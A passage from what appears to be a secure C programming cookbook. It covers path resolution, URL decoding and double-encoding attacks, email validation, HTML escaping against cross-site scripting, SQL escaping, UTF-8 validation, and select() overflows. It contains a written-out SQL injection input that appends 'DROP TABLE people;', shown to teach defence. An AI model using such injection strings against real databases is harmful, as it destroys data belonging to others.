DWORD GetFullPathName(LPCTSTR lpFileName, DWORD nBufferLength, LPTSTR lpBuffer,

LPTSTR *lpFilePart);

This function has the following arguments:

lpFileName

Path to be resolved.

nBufferLength

Size of the buffer, in characters, into which the resolved path will be written.

lpBuffer

Buffer into which the resolved path will be written.

lpFilePart

Pointer into lpBuffer that points to the filename portion of the resolved path. GetFullPathName( ) will set this pointer on return if it is successful in resolving the path.

When you initially call GetFullPathName( ), you should specify NULL for lpBuffer and 0 for nBufferLength. When you do this, the return value from GetFullPathName( ) will be the number of characters required to hold the resolved path, including the terminating null character. After you allocate the necessary buffer space, call GetFullPathName( ) again with nBufferLength and lpBuffer filled in appropriately.

WARNING

GetFullPathName( ) requires the length of the buffer to be specified in characters, not bytes. Likewise, the return value from the function will be in units of characters rather than bytes. When allocating memory for the buffer, be sure to multiply the number of characters by sizeof(TCHAR).

If an error occurs in resolving the path, GetFullPathName( ) will return 0, and you can call GetLastError( ) to determine the cause of the error; otherwise, it will return the number of characters written into lpBuffer.

In the following example, SpcResolvePath( ) demonstrates how to use GetFullPathName( ) properly. If it is successful, it will return a dynamically allocated buffer that contains the resolved path; otherwise, it will return NULL. The allocated buffer must be freed by calling LocalFree( ).

#include <windows.h>

LPTSTR SpcResolvePath(LPCTSTR lpFileName) {

DWORD dwLastError, nBufferLength;

LPTSTR lpBuffer, lpFilePart;

if (!(nBufferLength = GetFullPathName(lpFileName, 0, 0, &lpFilePart))) return 0;

if (!(lpBuffer = (LPTSTR)LocalAlloc(LMEM_FIXED, sizeof(TCHAR) * nBufferLength)))

return 0;

if (!GetFullPathName(lpFileName, nBufferLength, lpBuffer, &lpFilePart)) {

dwLastError = GetLastError( );

LocalFree(lpBuffer);

SetLastError(dwLastError);

return 0;

}

return lpBuffer;

}

3.8. Evaluating URL Encodings

Problem

You need to decode a Uniform Resource Locator (URL).

Solution

Iterate over the characters in the URL looking for a percent symbol followed by two hexadecimal digits. When such a sequence is encountered, combine the hexadecimal digits to obtain the character with which to replace the entire sequence. For example, in the ASCII character set, the letter "A" has the value 0x41, which could be encoded as "%41".

Discussion

RFC 1738 defines the syntax for URLs. Section 2.2 of that document also defines the rules for encoding characters in a URL. While some characters must always be encoded, any character may be encoded. Essentially, this means that before you do anything with a URL—whether you need to parse the URL into pieces (i.e., username, password, host, and so on), match portions of the URL against a whitelist or blacklist, or something else entirely—you need to decode it.

The problem is that you must make certain that you never decode a URL that has already been decoded; otherwise, you will be vulnerable to double-encoding attacks. Suppose that the URL contains the sequence "%25%34%31". Decoded once, the result is "%41" because "%25" is the encoding for the percent symbol, "%34" is the encoding for the number 4, and "%31" is the encoding for the number 1. Decoded twice, the result is "A".

At first glance, this may seem harmless, but what if you were to decode repeatedly until there were no more escaped characters? You would end up with certain sequences of characters that are impossible to represent. The purpose of encoding in the first place is to allow the use of characters that have special meaning or that cannot be represented visually.
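The double-decoding problem can be seen with a small single-pass decoder. This is only a sketch: url_decode_once( ) and hex_value( ) are hypothetical names used for illustration, and the caller is assumed to supply an output buffer at least as large as the input string plus one byte.

```c
#include <ctype.h>
#include <stddef.h>

/* Convert one hexadecimal digit (already checked with isxdigit( )) to its
 * numeric value. */
static int hex_value(int ch) {
  if (ch >= '0' && ch <= '9') return ch - '0';
  return toupper(ch) - 'A' + 10;
}

/* Hypothetical helper: decodes `in` into `out` exactly once and returns the
 * number of bytes written, not counting the terminating zero byte. `out`
 * must have room for strlen(in) + 1 bytes; decoding never grows the string. */
size_t url_decode_once(const char *in, char *out) {
  size_t n = 0;

  for (; *in; in++) {
    if (*in == '%' && isxdigit((unsigned char)in[1]) &&
        isxdigit((unsigned char)in[2])) {
      out[n++] = (char)(hex_value(in[1]) * 16 + hex_value(in[2]));
      in += 2; /* skip the two digits just consumed */
    } else {
      out[n++] = *in;
    }
  }
  out[n] = '\0';
  return n;
}
```

Passing "%25%34%31" through url_decode_once( ) yields "%41". Passing that result through a second time yields "A", which is exactly the second decode that a careful program must never perform on data it has already decoded.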

Another potential problem with encoding that is limited primarily to C and C++ is that a NULL-terminator can be encoded anywhere in the URL. There are several approaches to dealing with this problem. One is to treat the decoded string as a binary array rather than a C-style string; another is to use the SafeStr library described in Recipe 3.4 because it gives no special significance to any one character.

You can use the following spc_decode_url( ) function to decode a URL. It returns a dynamically allocated copy of the URL in decoded form. The result will be NULL-terminated, so it may be treated as a C-style string, but it may contain embedded NULLs as well. You can determine whether it contains embedded NULLs by comparing the number of bytes spc_decode_url( ) indicates that it returns with the result of calling strlen( ) on the decoded URL. If the URL contains embedded NULLs, the result from strlen( ) will be less than the number of bytes indicated by spc_decode_url( ).

#include <stdlib.h>

#include <string.h>

#include <ctype.h>

#define SPC_BASE16_TO_10(x) (((x) >= '0' && (x) <= '9') ? ((x) - '0') : \

(toupper((x)) - 'A' + 10))

char *spc_decode_url(const char *url, size_t *nbytes) {

char *out, *ptr;

const char *c;

if (!(out = ptr = strdup(url))) return 0;

for (c = url; *c; c++) {

if (*c != '%' || !isxdigit(c[1]) || !isxdigit(c[2])) *ptr++ = *c;

else {

*ptr++ = (SPC_BASE16_TO_10(c[1]) * 16) + (SPC_BASE16_TO_10(c[2]));

c += 2;

}

}

*ptr = 0;

if (nbytes) *nbytes = (ptr - out); /* does not include null byte */

return out;

}

See Also

§ RFC 1738: Uniform Resource Locators (URL)

§ Recipe 3.4

3.9. Validating Email Addresses

Problem

Your program accepts an email address as input, and you need to verify that the supplied address is valid.

Solution

Scan the email address supplied by the user, and validate it against the lexical rules set forth in RFC 822.

Discussion

RFC 822 defines the syntax for email addresses. Unfortunately, the syntax is complex, and it supports several address formats that are no longer relevant. The fortunate thing is that if anyone attempts to use one of these no-longer-relevant address formats, you can be reasonably certain they are attempting to do something they are not supposed to do.

You can use the following spc_email_isvalid( ) function to check the format of an email address. It will perform only a syntactical check and will not actually attempt to verify the authenticity of the address by attempting to deliver mail to it or by performing any DNS lookups on the domain name portion of the address.

The function only validates the actual email address and will not accept any associated data. For example, it will fail to validate "Bob Bobson <bob@bobson.com>", but it will successfully validate "bob@bobson.com". If the supplied email address is syntactically valid, spc_email_isvalid( ) will return 1; otherwise, it will return 0.

TIP

Keep in mind that almost any character is legal in an email address if it is properly quoted, so if you are passing an email address to something that may be sensitive to certain characters or character sequences (such as a command shell), you must be sure to properly escape those characters.

#include <string.h>

int spc_email_isvalid(const char *address) {

int count = 0;

const char *c, *domain;

static char *rfc822_specials = "()<>@,;:\\\"[]";

/* first we validate the name portion (name@domain) */

for (c = address; *c; c++) {

if (*c == '\"' && (c == address || *(c - 1) == '.' || *(c - 1) ==

'\"')) {

while (*++c) {

if (*c == '\"') break;

if (*c == '\\' && (*++c == ' ')) continue;

if (*c <= ' ' || *c >= 127) return 0;

}

if (!*c++) return 0;

if (*c == '@') break;

if (*c != '.') return 0;

continue;

}

if (*c == '@') break;

if (*c <= ' ' || *c >= 127) return 0;

if (strchr(rfc822_specials, *c)) return 0;

}

if (c == address || *(c - 1) == '.') return 0;

/* next we validate the domain portion (name@domain) */

if (!*(domain = ++c)) return 0;

do {

if (*c == '.') {

if (c == domain || *(c - 1) == '.') return 0;

count++;

}

if (*c <= ' ' || *c >= 127) return 0;

if (strchr(rfc822_specials, *c)) return 0;

} while (*++c);

return (count >= 1);

}

See Also

RFC 822: Standard for the Format of ARPA Internet Text Messages

3.10. Preventing Cross-Site Scripting

Problem

You are developing a web-based application, and you want to ensure that an attacker cannot exploit it in an effort to steal information from the browsers of other people visiting the same site.

Solution

When you are generating HTML that must contain external input, be sure to escape that input so that if it contains embedded HTML tags, the tags are not treated as HTML by the browser.

Discussion

Cross-site scripting attacks (often called CSS, but more frequently XSS in an effort to avoid confusion with cascading style sheets) are a general class of attacks with a common root cause: insufficient input validation. The goal of many cross-site scripting attacks is to steal information (usually the contents of some specific cookie) from unsuspecting users. Other times, the goal is to get an unsuspecting user to launch an attack on himself. These attacks are especially a problem for sites that store sensitive information, such as login data or session IDs, in cookies. Cookie theft could allow an attacker to hijack a session or glean other information that is intended to be private.

Consider, for example, a web-based message board, where many different people visit the site to read the messages that other people have posted, and to post messages themselves. When someone posts a new message to the board, if the message board software does not properly validate the input, the message could contain malicious HTML that, when viewed by other people, performs some unexpected action. Usually an attacker will attempt to embed some JavaScript code that steals cookies, or something similar.

Often, an attacker has to go to greater lengths to exploit a cross-site scripting vulnerability; the example described above is simplistic. An attacker can exploit any page that will include unescaped user input, but usually the attacker has to trick the user into displaying that page somehow. Attackers use many methods to accomplish this goal, such as fake pages that look like part of the site from which the attacker wishes to steal cookies, or embedded links in innocent-looking email messages.

It is not generally a good idea to allow users to embed HTML in any input accepted from them, but many sites allow simple tags in some input, such as those that enable bold or italics on text. Disallowing HTML altogether is the right solution in most cases, and it is the only solution that will guarantee that cross-site scripting will be prevented. Other common attempts at a solution, such as checking the referrer header for all requests (the referrer header is easily forged), do not work.

To disallow HTML in user input, you can do one of the following:

§ Refuse to accept anything that looks as if it may be HTML

§ Escape the special characters that enable a browser to interpret data as HTML

Attempting to recognize HTML and refuse it can be error-prone, unless you only look for the use of the greater-than (>) and less-than (<) symbols. Trying to match tags that will not be allowed (i.e., a blacklist) is not a good idea because it is difficult to do, and future revisions of HTML are likely to introduce new tags. Instead, if you are going to allow some tags to pass through, you should take the whitelist approach and only allow tags that you know are safe.

WARNING

JavaScript code injection does not require a <script> tag; many other tags can contain JavaScript code as well. For example, most tags support attributes such as "onclick" and "onmouseover" that can contain JavaScript code.

The following spc_escape_html( ) function will replace occurrences of special HTML characters with their escape sequences. For example, input that contains something like "<script>" will be replaced with "&lt;script&gt;", which no browser should ever interpret as HTML.

Our function will escape most HTML tags, but it will also allow some through. Those that it allows through are contained in a whitelist, and it will only allow them if the tags are used without any attributes. In addition, the a (anchor) tag will be allowed with a heavily restricted href attribute. The attribute must begin with "http://", and it must be the only attribute. The character set allowed in the attribute's value is also heavily restricted, which means that not all necessarily valid URLs will successfully make it through. In particular, if the URL contains "#", "?", or "&", which are certainly valid and all have special meaning, the tag will not be allowed.

If you do not want to allow any HTML through at all, you can simply remove the call to spc_allow_tag() in spc_escape_html(), and force all possible HTML to be properly escaped. In many cases, this will actually be the behavior that you'll want.
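For the case where no HTML should pass through at all, a stand-alone escaper can be much shorter than the whitelist version. The following is a minimal sketch under that assumption; escape_html_all( ) is a hypothetical name, and the function is not a drop-in replacement for anything else in this recipe.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: returns a malloc( )-allocated copy of `input` in
 * which every <, >, & and " has been replaced by its entity. No tags are
 * let through. The caller frees the result; NULL means out of memory. */
char *escape_html_all(const char *input) {
  const char *c;
  char *output, *ptr;

  /* "&quot;" is the longest replacement (6 bytes), so six output bytes per
   * input byte is a safe upper bound */
  if (!(output = ptr = (char *)malloc(strlen(input) * 6 + 1))) return NULL;
  for (c = input; *c; c++) {
    switch (*c) {
      case '<': memcpy(ptr, "&lt;", 4);   ptr += 4; break;
      case '>': memcpy(ptr, "&gt;", 4);   ptr += 4; break;
      case '&': memcpy(ptr, "&amp;", 5);  ptr += 5; break;
      case '"': memcpy(ptr, "&quot;", 6); ptr += 6; break;
      default:  *ptr++ = *c;              break;
    }
  }
  *ptr = '\0';
  return output;
}
```

The sketch deliberately over-allocates rather than making a separate pass to compute the exact length; for large inputs, a two-pass length calculation would use less memory.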

spc_escape_html() will return a C-style string dynamically allocated with malloc(), which the caller is responsible for deallocating with free(). If memory cannot be allocated, the return will be NULL. It also expects a C-style string containing the text to filter as its only argument.

#include <stdlib.h>

#include <string.h>

#include <strings.h> /* strncasecmp( ) */

#include <ctype.h>

/* These are HTML tags that do not take arguments. We special-case the <a> tag

* since it takes an argument. We will allow the tag as-is, or we will allow a

* closing tag (e.g., </p>). Additionally, we process tags in a case-

* insensitive way. Only letters and numbers are allowed in tags we can allow.

* Note that we do a linear search of the tags. A binary search is more

* efficient (log n time instead of linear), but more complex to implement.

* The efficiency hit shouldn't matter in practice.

*/

static const char *allowed_formatters[] = {

"b", "big", "blink", "i", "s", "small", "strike", "sub", "sup", "tt", "u",

"abbr", "acronym", "cite", "code", "del", "dfn", "em", "ins", "kbd", "samp",

"strong", "var", "dir", "li", "dl", "dd", "dt", "menu", "ol", "ul", "hr",

"br", "p", "h1", "h2", "h3", "h4", "h5", "h6", "center", "bdo", "blockquote",

"nobr", "plaintext", "pre", "q", "spacer",

/* include "a" here so that </a> will work */

"a"

};

#define SKIP_WHITESPACE(p) while (isspace(*p)) p++

static int spc_is_valid_link(const char *input) {

static const char *href = "href";

static const char *http = "http://";

int quoted_string = 0, seen_whitespace = 0;

if (!isspace(*input)) return 0;

SKIP_WHITESPACE(input);

if (strncasecmp(href, input, strlen(href))) return 0;

input += strlen(href);

SKIP_WHITESPACE(input);

if (*input++ != '=') return 0;

SKIP_WHITESPACE(input);

if (*input == '"') {

quoted_string = 1;

input++;

}

if (strncasecmp(http, input, strlen(http))) return 0;

for (input += strlen(http); *input && *input != '>'; input++) {

switch (*input) {

case '.': case '/': case '-': case '_':

break;

case '"':

if (!quoted_string) return 0;

input++; /* step past the closing quote before looking for '>' */

SKIP_WHITESPACE(input);

if (*input != '>') return 0;

return 1;

default:

if (isspace(*input)) {

if (seen_whitespace && !quoted_string) return 0;

SKIP_WHITESPACE(input);

seen_whitespace = 1;

break;

}

if (!isalnum(*input)) return 0;

break;

}

}

return (*input && !quoted_string);

}

static int spc_allow_tag(const char *input) {

int i;

const char *tmp;

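/* Only "a" followed by whitespace can be a link; tags such as "abbr" must fall through to the list below */

if ((*input == 'a' || *input == 'A') && isspace((unsigned char)input[1]))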

return spc_is_valid_link(input + 1);

if (*input == '/') {

input++;

SKIP_WHITESPACE(input);

}

for (i = 0; i < (int)(sizeof(allowed_formatters) / sizeof(allowed_formatters[0])); i++) {

if (strncasecmp(allowed_formatters[i], input, strlen(allowed_formatters[i])))

continue;

else {

tmp = input + strlen(allowed_formatters[i]);

SKIP_WHITESPACE(tmp);

if (*tmp == '>') return 1;

}

}

return 0;

}

/* Note: This interface expects a C-style NULL-terminated string. */

char *spc_escape_html(const char *input) {

char *output, *ptr;

size_t outputlen = 0;

const char *c;

/* This is a worst-case length calculation */

for (c = input; *c; c++) {

switch (*c) {

case '<': outputlen += 4; break; /* &lt; */

case '>': outputlen += 4; break; /* &gt; */

case '&': outputlen += 5; break; /* &amp; */

case '"': outputlen += 6; break; /* &quot; */

default: outputlen += 1; break;

}

}

if (!(output = ptr = (char *)malloc(outputlen + 1))) return 0;

for (c = input; *c; c++) {

switch (*c) {

case '<':

if (!spc_allow_tag(c + 1)) {

*ptr++ = '&'; *ptr++ = 'l'; *ptr++ = 't'; *ptr++ = ';';

break;

} else {

do {

*ptr++ = *c;

} while (*++c != '>');

*ptr++ = '>';

break;

}

case '>':

*ptr++ = '&'; *ptr++ = 'g'; *ptr++ = 't'; *ptr++ = ';';

break;

case '&':

*ptr++ = '&'; *ptr++ = 'a'; *ptr++ = 'm'; *ptr++ = 'p';

*ptr++ = ';';

break;

case '"':

*ptr++ = '&'; *ptr++ = 'q'; *ptr++ = 'u'; *ptr++ = 'o';

*ptr++ = 't'; *ptr++ = ';';

break;

default:

*ptr++ = *c;

break;

}

}

*ptr = 0;

return output;

}

3.11. Preventing SQL Injection Attacks

Problem

You are developing an application that interacts with a SQL database, and you need to defend against SQL injection attacks.

Solution

SQL injection attacks are most common in web applications that use a database to store data, but they can occur anywhere that a SQL command string is constructed from any type of input from a user. Specifically, a SQL injection attack is mounted by inserting characters into the command string that create a compound command in a single string. For example, suppose a query string is created with a WHERE clause that is constructed from user input. A proper command might be:

SELECT * FROM people WHERE first_name="frank";

If the value "frank" comes directly from user input and is not properly validated, an attacker could include a closing double quote and a semicolon that would complete the SELECT command and allow the attacker to append additional commands. For example:

SELECT * FROM people WHERE first_name="frank"; DROP TABLE people;
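To make the attack concrete, the following sketch shows the kind of code that is vulnerable. The function build_query_naive( ) is a hypothetical example of what not to do; it is shown only to illustrate how the compound command above comes about.

```c
#include <stdio.h>

/* Hypothetical example of what NOT to do: the user-supplied name is pasted
 * into the command string without any validation or escaping. Returns the
 * length snprintf( ) reports, or a negative value on error. */
int build_query_naive(char *buf, size_t buflen, const char *first_name) {
  return snprintf(buf, buflen,
                  "SELECT * FROM people WHERE first_name=\"%s\";", first_name);
}
```

If first_name is the string frank"; DROP TABLE people; -- then the buffer ends up holding SELECT * FROM people WHERE first_name="frank"; DROP TABLE people; --"; and the attacker has closed the literal early and appended a second command. The trailing -- is there because many SQL dialects treat it as the start of a comment, which hides the leftover quote.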

Obviously, the best way to avoid SQL injection attacks is to not create SQL command strings that include any user input. In some small number of applications, this may be feasible, but more frequently it is not. Avoid including user input in SQL commands as much as you can, but where it cannot be avoided, you should escape dangerous characters.

Discussion

SQL injection attacks are really just general input validation problems. Unfortunately, there is no perfect solution to preventing these types of attacks. Your best defense is to apply strict checking of input—even going so far as to refuse questionable input rather than attempt to escape it—and hope that that is a strong enough defense.

There are two main approaches that can be taken to avoid SQL injection attacks:

Restrict user input to the smallest character set possible, and refuse any input that contains characters outside of that set.

In many cases, user input needs to be used in queries such as looking up a username or a message number, or some other relatively simple piece of information. It is rare to need any character in a user name other than the set of alphanumeric characters. Similarly, message numbers or other similar identifiers can safely be restricted to digits.

With SQL, problems start to occur when symbol characters that have special meaning are allowed. Examples of such characters are quotes (both double and single), semicolons, percent symbols, hyphens, and underscores. Avoid these characters wherever possible; they are often unnecessary, and allowing them at all just makes things more difficult for everyone except an attacker.

Escape characters that have special significance to SQL command processors.

In SQL parlance, anything that is not a keyword or an identifier is a literal. Keywords are portions of a SQL command such as SELECT or WHERE, and an identifier would typically be the name of a table or the name of a field. In some cases, SQL syntax allows literals to appear without enclosing quotes, but as a general rule you should always enclose literals with quotes.

Literals should always be enclosed in single quotes ('), but some SQL implementations allow you to use either single or double quotes ("). Whichever you choose to use, always close the literal with the same character with which you opened it.

Within literals, most characters are safe to leave unescaped, and in many cases, it is not possible to escape them. Certainly, with whichever quoting character you choose to use with your literals, you may need to allow that character inside the literal. Escaping quotes is done by doubling up on the quote character. Other characters that should always be escaped are control characters and the escape character itself (a backslash).

Finally, if you are using the LIKE keyword in a WHERE clause, you may wish to prevent input from containing wildcard characters. In fact, it is a good idea to prevent wildcard characters in most circumstances. Wildcard characters include the percent symbol, underscore, and square brackets.
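The first approach described above, restricting input to the smallest possible character set, needs very little code. The following is a sketch only; is_simple_username( ) and is_message_number( ) are hypothetical names, and the exact character sets are assumptions that you should adjust to your own data.

```c
#include <ctype.h>

/* Hypothetical helper: returns 1 if `s` is non-empty and made up solely of
 * ASCII letters and digits, 0 otherwise. */
int is_simple_username(const char *s) {
  if (!*s) return 0;
  for (; *s; s++) {
    /* reject non-ASCII bytes first so the result does not depend on locale */
    if ((unsigned char)*s > 127 || !isalnum((unsigned char)*s)) return 0;
  }
  return 1;
}

/* Hypothetical helper: returns 1 if `s` is non-empty and made up solely of
 * decimal digits, 0 otherwise. */
int is_message_number(const char *s) {
  if (!*s) return 0;
  for (; *s; s++) {
    if (*s < '0' || *s > '9') return 0;
  }
  return 1;
}
```

Input that fails such a check is refused outright rather than repaired, so there is nothing left for an attacker to smuggle past the escaping step.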

You can use the function spc_escape_sql( ) , shown at the end of this section, to escape all of the characters that we've mentioned. As a convenience (and partly due to necessity), the function will also surround the escaped string with the quote character of your choice. The return from the function will be the quoted and escaped version of the input string. If an error occurs (e.g., out of memory, or an invalid quoting character chosen), the return will be NULL.

spc_escape_sql( ) requires three arguments:

input

The string that is to be escaped.

quote

The quote character to use. It must be either a single or double quote. Any other character will cause spc_escape_sql( ) to return failure.

wildcards

If this argument is specified as 0, wildcard characters recognized by the LIKE operator in a WHERE clause will not be escaped; otherwise, they will be. You should only escape wildcards when you are going to be using the escaped string as the right-hand side for the LIKE operator.

#include <stdlib.h>

#include <string.h>

char *spc_escape_sql(const char *input, char quote, int wildcards) {

char *out, *ptr;

const char *c;

/* If every character in the input needs to be escaped, the resulting string

* would at most double in size. Also, include room for the surrounding

* quotes.

*/

if (quote != '\'' && quote != '\"') return 0;

if (!(out = ptr = (char *)malloc(strlen(input) * 2 + 2 + 1))) return 0;

*ptr++ = quote;

for (c = input; *c; c++) {

switch (*c) {

case '\'': case '\"':

if (quote == *c) *ptr++ = *c;

*ptr++ = *c;

break;

case '%': case '_': case '[': case ']':

if (wildcards) *ptr++ = '\\';

*ptr++ = *c;

break;

case '\\': *ptr++ = '\\'; *ptr++ = '\\'; break;

case '\b': *ptr++ = '\\'; *ptr++ = 'b'; break;

case '\n': *ptr++ = '\\'; *ptr++ = 'n'; break;

case '\r': *ptr++ = '\\'; *ptr++ = 'r'; break;

case '\t': *ptr++ = '\\'; *ptr++ = 't'; break;

default:

*ptr++ = *c;

break;

}

}

*ptr++ = quote;

*ptr = 0;

return out;

}

3.12. Detecting Illegal UTF-8 Characters

Problem

Your program accepts external input in UTF-8 encoding. You need to make sure that the UTF-8 encoding is valid.

Solution

Scan the input string for illegal UTF-8 sequences. If any illegal sequences are detected, reject the input.

Discussion

UTF-8 is an encoding that is used to represent multibyte character sets in a way that is backward-compatible with single-byte character sets. Another advantage of UTF-8 is that it ensures there are no NULL bytes in the data, with the exception of an actual NULL byte. Encodings such as Unicode's UCS-2 may (and often do) contain NULL bytes as "padding" if they are treated as byte streams. For example, the letter "A" is 0x41 in ASCII or UTF-8, but it is 0x0041 in UCS-2.

The first byte in a UTF-8 sequence determines the number of bytes that follow it to make up the complete sequence. The number of upper bits set in the first byte minus one indicates the number of bytes that follow. A bit that is never set immediately follows the count, and the remaining bits are used as part of the character encoding. The bytes that follow the first byte will always have the upper two bits set and unset, respectively; the remaining bits are combined with the encoding bits from the other bytes in the sequence to compute the character. Table 3-2 lists the binary encodings for the range of characters from 0x00000000 to 0x7FFFFFFF.

Table 3-2. UTF-8 encoding byte sequences

Byte range                 UTF-8 binary representation
0x00000000 - 0x0000007F    0bbbbbbb
0x00000080 - 0x000007FF    110bbbbb 10bbbbbb
0x00000800 - 0x0000FFFF    1110bbbb 10bbbbbb 10bbbbbb
0x00010000 - 0x001FFFFF    11110bbb 10bbbbbb 10bbbbbb 10bbbbbb
0x00200000 - 0x03FFFFFF    111110bb 10bbbbbb 10bbbbbb 10bbbbbb 10bbbbbb
0x04000000 - 0x7FFFFFFF    1111110b 10bbbbbb 10bbbbbb 10bbbbbb 10bbbbbb 10bbbbbb
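The layout in Table 3-2 can be turned into an encoder in a few lines. The following is a sketch for illustration; utf8_encode( ) is a hypothetical name. It follows the six-byte scheme shown in the table, whereas the later RFC 3629 definition of UTF-8 stops at four bytes, so treat the five- and six-byte branches as historical.

```c
#include <stddef.h>

/* Hypothetical helper: encodes `value` (0 to 0x7FFFFFFF) using the shortest
 * sequence from Table 3-2. Writes up to six bytes to `out` and returns the
 * number written, or 0 if `value` is out of range. */
size_t utf8_encode(unsigned long value, unsigned char out[6]) {
  size_t nbytes, i;
  unsigned char lead;

  if (value <= 0x7FUL) { out[0] = (unsigned char)value; return 1; }
  else if (value <= 0x7FFUL)      { nbytes = 2; lead = 0xC0; }
  else if (value <= 0xFFFFUL)     { nbytes = 3; lead = 0xE0; }
  else if (value <= 0x1FFFFFUL)   { nbytes = 4; lead = 0xF0; }
  else if (value <= 0x3FFFFFFUL)  { nbytes = 5; lead = 0xF8; }
  else if (value <= 0x7FFFFFFFUL) { nbytes = 6; lead = 0xFC; }
  else return 0;

  /* fill the continuation bytes from the end, six payload bits at a time */
  for (i = nbytes - 1; i > 0; i--) {
    out[i] = (unsigned char)(0x80 | (value & 0x3F));
    value >>= 6;
  }
  /* whatever is left fits in the payload bits of the first byte */
  out[0] = (unsigned char)(lead | value);
  return nbytes;
}
```

For example, the value 0x20AC falls in the third row of the table and encodes as the three bytes 0xE2 0x82 0xAC.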

The problem with UTF-8 encoding is that invalid sequences can be embedded in the data. The UTF-8 specification states that the only legal encoding for a character is the shortest sequence of bytes that yields the correct value. Longer sequences may be able to produce the same value as a shorter sequence, but they are not legal; such a longer sequence is called an overlong sequence .

The security issue posed by overlong sequences is that allowing them makes it significantly more difficult to analyze a UTF-8 encoded string because multiple representations are possible for the same character. It would be possible to recognize overlong sequences and convert them to the shortest sequence, but we recommend against doing that because there may be other issues involved that have not yet been discovered. We recommend that you reject any input that contains an overlong sequence.

The following spc_utf8_isvalid( ) function will scan a string encoded in UTF-8 to verify that it contains only valid sequences. It will return 1 if the string contains only legitimate encoding sequences; otherwise, it will return 0.

int spc_utf8_isvalid(const unsigned char *input) {

int i, nb;

const unsigned char *c = input;

for (c = input; *c; c += (nb + 1)) {

if (!(*c & 0x80)) nb = 0;

else if ((*c & 0xc0) == 0x80) return 0; /* continuation byte with no first byte */

else if ((*c & 0xe0) == 0xc0) nb = 1;

else if ((*c & 0xf0) == 0xe0) nb = 2;

else if ((*c & 0xf8) == 0xf0) nb = 3;

else if ((*c & 0xfc) == 0xf8) nb = 4;

else if ((*c & 0xfe) == 0xfc) nb = 5;

else return 0; /* 0xfe and 0xff are never legal */

/* each of the nb bytes after the first must have the form 10bbbbbb */

for (i = 1; i <= nb; i++)

if ((c[i] & 0xc0) != 0x80) return 0;

}

return 1;

}
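A check of the bit patterns alone does not catch overlong sequences, because an overlong sequence is structurally well formed. One way to detect them, sketched below, is to decode each sequence and compare the result with the smallest value that legitimately needs that many bytes. The name utf8_decode_strict( ) is hypothetical, and the minimum values are taken from Table 3-2.

```c
#include <stddef.h>

/* Hypothetical helper: decodes the sequence starting at `c`, stores its
 * value in `*value`, and returns the sequence length in bytes. Returns 0 if
 * the sequence is malformed or overlong. */
size_t utf8_decode_strict(const unsigned char *c, unsigned long *value) {
  /* smallest value that legitimately needs 1..6 bytes (index = length) */
  static const unsigned long min_value[7] = {
    0, 0x0UL, 0x80UL, 0x800UL, 0x10000UL, 0x200000UL, 0x4000000UL
  };
  size_t len, i;
  unsigned long v;

  if (!(*c & 0x80))             { len = 1; v = *c; }
  else if ((*c & 0xe0) == 0xc0) { len = 2; v = *c & 0x1f; }
  else if ((*c & 0xf0) == 0xe0) { len = 3; v = *c & 0x0f; }
  else if ((*c & 0xf8) == 0xf0) { len = 4; v = *c & 0x07; }
  else if ((*c & 0xfc) == 0xf8) { len = 5; v = *c & 0x03; }
  else if ((*c & 0xfe) == 0xfc) { len = 6; v = *c & 0x01; }
  else return 0; /* stray continuation byte, 0xfe, or 0xff */

  for (i = 1; i < len; i++) {
    /* a terminating zero byte fails this test too, so we never run past it */
    if ((c[i] & 0xc0) != 0x80) return 0;
    v = (v << 6) | (c[i] & 0x3f);
  }
  if (v < min_value[len]) return 0; /* a shorter sequence exists: overlong */
  *value = v;
  return len;
}
```

With this check, the two-byte sequence 0xC1 0x81 is rejected: it decodes to 0x41, the letter "A", which must be encoded as the single byte 0x41.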

3.13. Preventing File Descriptor Overflows When Using select( )

Problem

Your program uses the select( ) system call to determine when sockets are ready for writing, have data waiting to be read, or have an exceptional condition (e.g., out-of-band data has arrived). Using select( ) requires the use of the fd_set data type, which typically entails the use of the FD_*( ) family of macros. In most implementations, FD_SET( ) and FD_CLR( ), in particular, are susceptible to an array overrun.

Solution

Do not use the FD_*( ) family of macros. Instead, use the macros that are provided in this recipe. The FD_SET( ) and FD_CLR( ) macros will modify an fd_set object without performing any bounds checking. The macros we provide will do proper bounds checking.

Discussion

The select( ) system call is normally used to multiplex sockets. In a single-threaded environment, select( ) allows you to build sets of socket descriptors for which you wish to wait for data to become available or that you wish to have available to write data to. The fd_set data type is used to hold a list of the socket descriptors, and several standard macros are used to manipulate objects of this type.

Normally, fd_set is defined as a structure with a single member that is a statically allocated array of long integers. Because socket descriptors are always numbered starting with 0 and ending with the highest allowable descriptor, the array of integers in an fd_set is actually treated as a bitmask with a one-to-one correspondence between bits and socket descriptors.

The size of the array in the fd_set structure is determined by the FD_SETSIZE macro. Most often, the size of the array is sufficiently large to be able to handle any possible file descriptor, but the problem is that most implementations of the FD_SET( ) and FD_CLR( ) macros (which are used to set and clear socket descriptors in an fd_set object) do not perform any bounds checking and will happily overrun the array if asked to do so.

If FD_SETSIZE is defined to be sufficiently large, why is this a problem? Consider the situation in which a server program is compiled with FD_SETSIZE defined to be 256, which is normally the maximum number of file and socket descriptors allowed in a Unix process. Everything works just fine for a while, but eventually the number of allowed file descriptors is increased to 512 because 256 are no longer enough for all the connections to the server. The increase in file descriptors could be done externally by using setrlimit( ) before starting the server process (with the bash shell, the command would be ulimit -n 512).
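Before moving to a dynamically sized set, it can help to see the problem in code. The following sketch shows two hypothetical helpers: checked_fd_set( ) refuses descriptors that do not fit in a standard fd_set instead of overrunning it, and fd_limit_exceeds_setsize( ) reports whether the current descriptor limit makes such descriptors possible. Neither is the approach this recipe goes on to develop; they simply make the missing bounds check explicit.

```c
#include <sys/resource.h>
#include <sys/select.h>

/* Hypothetical wrapper: adds `fd` to `set` only if it fits. Returns 0 on
 * success, or -1 if `fd` is negative or would index past the fixed array. */
int checked_fd_set(int fd, fd_set *set) {
  if (fd < 0 || fd >= FD_SETSIZE) return -1;
  FD_SET(fd, set);
  return 0;
}

/* Hypothetical helper: returns 1 if the process may currently be handed a
 * descriptor too large for an fd_set, 0 if not, or -1 if the limit cannot
 * be read. */
int fd_limit_exceeds_setsize(void) {
  struct rlimit lim;

  if (getrlimit(RLIMIT_NOFILE, &lim) != 0) return -1;
  /* rlim_cur is one more than the highest descriptor the process can open */
  if (lim.rlim_cur == RLIM_INFINITY) return 1;
  return (lim.rlim_cur > (rlim_t)FD_SETSIZE);
}
```

A server that calls fd_limit_exceeds_setsize( ) at startup can at least log a warning when the limit has been raised past what it was compiled to handle.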

